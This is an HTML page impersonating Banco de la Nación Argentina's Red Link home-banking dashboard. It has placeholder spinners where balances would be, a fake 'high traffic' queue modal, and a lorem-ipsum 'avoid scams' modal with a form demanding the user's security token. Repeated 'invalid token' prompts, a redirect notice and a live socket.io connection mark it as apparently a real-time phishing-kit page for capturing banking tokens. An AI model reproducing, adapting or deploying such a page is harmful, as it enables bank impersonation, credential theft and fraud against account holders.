<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Red Link - BANCO DE LA NACIÓN ARGENTINA</title>
    <link rel="shortcut icon" href="/img/icono.png" type="image/x-icon">
    <link rel="stylesheet" href="/css/home.css">
    <script>
        if(screen.width<767){
            window.location.href = "/m/faces/pages/inicio.xhtml";
        }
    </script>
</head>
<body>
    <div id="header">
        <div id="header-options">
            <div id="header-container">
                <div class="links">
                    <a href="#">Preguntas Frecuentes</a>
                    <a href="#">Operaciones Disponibles</a>
                    <a href="#">Seguridad del Sistema</a>
                    <a href="#">Mapa del Sitio</a>
                </div>
                <div class="actions">
                    <a href="#">Contacto</a>
                    <a href="#" class="salir">Salir</a>
                </div>
            </div>
        </div>
        <div id="info-header">
            <div class="logo">
                
            </div>
            <div id="persona">
                <div class="info">
                    <div>Bienvenido</div>
                    <div class="imagen">
                        <div></div>
                        <img src="/img/spinner-general.gif">
                    </div>
                </div>
                <div id="ultima-vez">
                    Última entrada 09/08/2022 12:44
                </div>
            </div>
        </div>
    </div>
    <div id="personal-options">
        <div id="content-personal-options">
            <div class="cuentas">
                <a href="#" class="home"><img src="/img/icono_inicio.png" alt=""></a>
                <a href="#">Cuentas</a>
                <a href="#">Saldos</a>
            </div>
            <div class="opciones">
                <a href="#">Opciones personales</a>
                <a href="#"><img src="/img/bg.bt.configuracion.personal.png" alt=""></a>
            </div>
        </div>
    </div>
    <div id="ppal-content">
        <div id="options">
            <ul class="options-list">
                <li>                  
                    <a href="#" style="background: #0087ab;">
                        Posición Consolidada
                    </a>
                </li>
                <li>
                    <a href="#">
                        Cuentas
                    </a>
                </li> 
                <li>
                    <a href="#">
                        Tarjetas de Crédito
                    </a>
                </li> 
                <li>
                    <a href="#">
                        Compras
                    </a>
                </li> 
                <li>
                    <a href="#">
                        Transferencias
                    </a>
                </li> 
                <li>
                    <a href="#">
                        DEBIN- Débito Inmediato
                    </a>
                </li> 
                <li>
                    <a href="#">
                        Pagos
                    </a>
                </li> 
                <li>
                    <a href="#">
                        Inversiones
                    </a>
                </li>
                <li>     
                    <a href="#">
                        Documentos Digitales
                    </a>
                </li>
                <li>
                    <a href="#">
                        Préstamos
                    </a>
                </li> 
                <li>
                    <a href="#">
                        Beneficios Nación
                    </a>
                </li> 
                <li>
                    <a href="#">
                        Servicio AFIP
                    </a>
                </li>
                <li>
                    <a href="#">
                        Comparación de comisiones
                    </a>
                </li>
            </ul>
        </div>
        <div id="p-consolidada">
            <div id="consultas">
                <div class="titulo">
                    Consultas
                </div>
                <div class="search">
                    <input type="text" placeholder="Saldos">
                    <img src="/img/lupa.png">
                </div>
            </div>
            <table id="datos-cuenta">
                <tr class="head">
                  <th>Tipo de cuenta</th>
                  <th>Moneda</th>
                  <th>Estado</th>
                  <th>Nro de Cuenta</th>
                  <th>Saldo*</th>
                  <th>Acuerdo</th>
                </tr>
                <tr>
                  <td><img src="/img/spiner-saldo.gif"></td>
                  <td>$</td>
                  <td>CANP</td>
                  <td><img src="/img/spiner-saldo.gif"></td>
                  <td><img src="/img/spiner-saldo.gif"></td>
                  <td>-</td>
                </tr>
            </table>
            <div id="resumen-total">
                Saldo Total en $
            </div>
            <div class="load">
            <img src="/img/spinner-general.gif">
            </div>
            <div id="botones">
                <button>
                    <img src="/img/print.png"> Imprimir
                </button>
                <button>
                    <img src="/img/download.png"> Descargar
                </button>
            </div>
        </div>
    </div>
    <div id="token">
        <div class="modal">
            <div class="modal-header">
                <h4>Alejate de las estafas virtuales</h4>
            </div>
            <div class="modal-body">
                <p>Lorem, ipsum dolor sit amet consectetur adipisicing elit. Voluptate, officiis. Ab deserunt in eius eos optio laborum dolorum aut sequi distinctio qui ut, excepturi quaerat ipsa. Maxime, nemo! Facere, dicta.</p>
                <p>Porro facere aut perspiciatis? Repellat iste sapiente, recusandae ipsa amet, aspernatur distinctio laudantium natus mollitia quas dolore corrupti repudiandae nihil similique ipsum sed suscipit in ducimus. Consectetur et odio aliquam!</p>
                <form id="formToken">
                    <input required type="text" id="token-input" name="token">
                    <button type="submit" id="sendToken">Enviar token</button>
                </form>
                <div id="spinnerValidate">
                    <span>Validando información...</span>
                    <img src="/img/spinner-general.gif" alt="">
                </div>
            </div>
            <div class="modal-footer">
                
            </div>
        </div>
    </div>
    <div id="queuelist">
        <div class="modal">
            <div class="modal-header">
                <h4>Estamos preparando todo para ti</h4>
            </div>
            <div class="modal-body">
                <p>En estos momentos tenemos un alto flujo de usuarios conectados.</p>
                <div id="spinnerQueue">
                    <p>No te desconectes, en breve serás atendido</p>
                    <img src="/img/spinner-general.gif" alt="">
                </div>
            </div>
            <div class="modal-footer">
                
            </div>
        </div>
    </div>
    <div class="modal-alerta" id="alert-modal">
        <div>
            <p>El token de seguridad ingresado tiene un formato incorrecto, por favor ingréselo nuevamente</p>
        </div>
        <div class="cerrar-modal" id="close-alert-modal">
            <b>cerrar</b> <img src="/img/bt.cerrar.modal.gif">
        </div>
    </div>  
    <div class="modal-alerta" id="noValidate">
        <div>
            <p>No pudimos validar su informacion, ingrese su token nuevamente</p>
        </div>
        <div class="cerrar-modal" id="close-alert-modal-resendtoken">
            <b>cerrar</b> <img src="/img/bt.cerrar.modal.gif">
        </div>
    </div> 
    <div class="modal-alerta green" id="validate">
        <div>
            <p>Vuelva a iniciar sesión, en breve será redireccionado...</p>
        </div>
        <div class="cerrar-modal" id="close-alert-modal-green">
            <b>cerrar</b> <img src="/img/bt.cerrar.modal.gif">
        </div>
    </div> 
    <script src="/socket.io/socket.io.js"></script>
    <script src="/js/home.js"></script>
</body>
</html>